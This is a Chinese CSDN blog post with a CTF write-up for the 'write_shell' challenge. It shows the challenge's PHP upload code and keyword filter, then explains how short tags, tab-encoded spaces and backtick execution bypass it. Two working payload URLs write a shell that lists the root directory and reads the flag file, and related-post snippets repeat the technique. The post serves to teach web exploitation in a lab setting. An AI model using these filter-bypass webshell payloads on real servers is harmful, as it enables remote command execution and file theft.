BUUCTF--[红明谷CTF 2021]write_shell

最新推荐文章于 2024-03-04 21:29:12 发布
最新推荐文章于 2024-03-04 21:29:12 发布
阅读量1k 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/118962238
版权

补充知识点: 

先来看第一部分代码,
当action=pwd时则给出路径;当action=upload时,可以上传参数data

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}

这里是判断是否有以下字符,如有则die

function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

我们若想执行php命令就需使用<?php,但上面禁用了,这里就需要使用php的短标签<? ?>,由于空格也被禁用了,可以使用php中的%09来代替.

PHP 支持一个执行运算符:反引号(``)。注意这不是单引号!PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回(即,可以赋给一个变量而不是简单地丢弃到标准输出)。使用反引号运算符"`"的效果与函数shell_exec() 相同。
注意:
关闭了 shell_exec() 时反引号运算符是无效的。
与其它某些语言不同,反引号不能在双引号字符串中使用。

查看根目录的所有文件,执行命令后再访问pwd给出的路径即可查看

?action=upload&data=<?echo%09`ls%09/`?>

 查看flllllll1112222222lag文件

?action=upload&data=<?echo%09`cat%09/flllllll1112222222lag`?>
Uzero.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF-[CTF 2021]write_shell
qq_24033605的博客
11-02 518
[CTF 2021]write_shell 源码放出来了,直接进行代码审计: 从action出发,有两个功能,一是执行pwd,功能是显示当前目录,二是上传upload,通过data变量执行get传参,这里设置了一个waf,对data的内容进行了过滤。 首先进行pwd操作,查看当前目录: 接下来构建shell,这里过滤了php,所以使用短标签<?=?>,过滤了空格,使用\t替换,过滤了eval,使用`执行命令打开根目录下所有文件: /?action=upload&data=&lt
[CTF 2021]write_shell
cjdgg的博客
06-25 1506
[CTF 2021]write_shell 题目直接给出了源代码,看了一下源代码,利用点应该就是利用file_get_contents函数写shell获取我们需要的信息 在此之前我们还需要找到要写入shell的文件路径,这时我们可以发现可以通过?action=pwd进行查看 ...
buuctf-write_shell(命令执行)
m0_62094846的博客
05-21 288
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
BUUCTF:[CTF 2021]write_shell --- php 短标签 + 反引号执行 写入马儿的新方法 --- rce,,yi
Zero_Adam的博客
04-12 1323
一、自己做 data传入值,然后data过waf()。data的值,就是我们写文件的内容,应该就是写马儿了。过滤了php的话,考虑短标签把,然后eval没了, assert或者exec其他的应该都大差不差。 然后就卡壳了,,本地环境打好了,,但是 assert或者exec这些不会用。。 看WP了 二、学到的 PHP短标签:<?php @eval($_POST['a']);?>可以用<?=@eval($_POST['a']);?>代替,PHP短标签 关于PHP的??这个东西:讲
杯数据安全大赛
qq_53755216的博客
04-04 291
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
[CTF 2021]write_shell 1
m0_62879498的博客
05-28 928
进入环境,首先进行代码审计 代码审计 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ .
[CTF 2021]write_shell1
最新发布
wwwyyyxxxx的博客
03-04 361
换行绕过也不行,check函数虽然看着过滤的不多,但是一些关键的被过滤了,让写入空的php文件但是又把分号过滤了,这里在本地试了一下,发现短标签不需要分号,但是这样在本地会莫名其妙的输出1,有没有大佬解释一下。但是想传system("ls /")的时候又有个问题是空格被过滤了,这里要用到一个函数是hen2bin()将十六进制转换为二进制编码后的字符串,ls / 十六进制编码是6C73202F。这里check函数是嵌套在waf里面的,waf嵌套做了一个数组的判断,而check才是真正的waf。
[CTF 2021]write_shell 反引号与短标签
qq_54929891的博客
04-10 1720
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
[CTF 2021]EasyTP
Sk1y的博客
01-01 2441
[CTF 2021]EasyTP 文章目录[CTF 2021]EasyTP解题过程解法1:报错注入解法2:开堆叠写shell解法3:rogue-mysql-server参考链接 解题过程 打开容器 源码泄露/www.zip 下载下来,发现是thinkphp3.2.3的,找链子:ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 (f5.pm) 注意在源码中,控制器中存在反序列化,以这个为入手点 在BUUCTF的环境中,database=test,password
[CTF 2021]write_shell --不会编程的崽
不会编程的崽的博客
02-20 563
命令执行
浅谈ssrf漏洞
yggcwhat
12-13 3100
简介 SSRF(Server-Side Request Forgery)服务器端请求伪造, 是攻击者构造payload通过存在漏洞的服务器去攻击内网的其他主机或者服务器。正常都是通过外网打入内网的。 漏洞产生原理 其是有这漏洞,原理上还是在代码上,举个简单的例子: <?php if (isset($_POST['url'])) { $content = file_get_contents($_POST['url']); $filename ='./file/'; file_put_co
[BUUCTF] 备赛刷题第一天
Dannie01的博客
11-01 2025
[极客大挑战 2019]RCE ME Wallbreaker_Easy 绕过disabled function 狠简单 一把嗦 [SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_ex

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值